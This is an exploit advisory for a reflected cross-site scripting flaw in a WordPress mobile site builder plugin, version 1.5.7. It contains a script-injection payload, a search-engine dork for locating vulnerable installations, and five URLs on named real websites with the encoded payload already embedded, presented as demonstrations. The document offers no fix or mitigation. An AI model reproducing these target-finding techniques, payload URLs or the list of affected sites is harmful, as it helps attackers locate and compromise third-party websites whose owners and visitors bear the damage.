WordPress MobileChief Mobile Site Builder plugin suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
82f649c8ad747842d6c10048a9dbcba503dcaf02a4f6bd9cfa8a8017df2d094c
====================================================================
# Exploit Title : Wordpress MobileChief - Mobile Site Builder plugin Cross
site scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org
# Plugin Link :
http://downloads.wordpress.org/plugin/mobilechief-mobile-site-creator.1.5.7.zip
# Version : 1.5.7
# Google Dork : inurl:wp-content/plugins/mobilechief-mobile-site-creator
# Date: 2013/10/26
# Tested on: Windows 7
#
------------------------------------------------
#
# Exploit :
#
# Location :
http://site.com/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/[xss]
#
# Script For Test : "/><script>alert(1);</script>
#
------------------------------------------------
#
# Demo:
#
#
http://aactionhomeservices.net/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.bsusos.com/main/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.happyrecyclers.com/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.floridanpalace.com/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.bnhre.net/wp-content/plugins/mobilechief-mobile-site-creator/lib/jquery-validate/demo/captcha/index.php/%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
######################
discovered by : ACC3SS
######################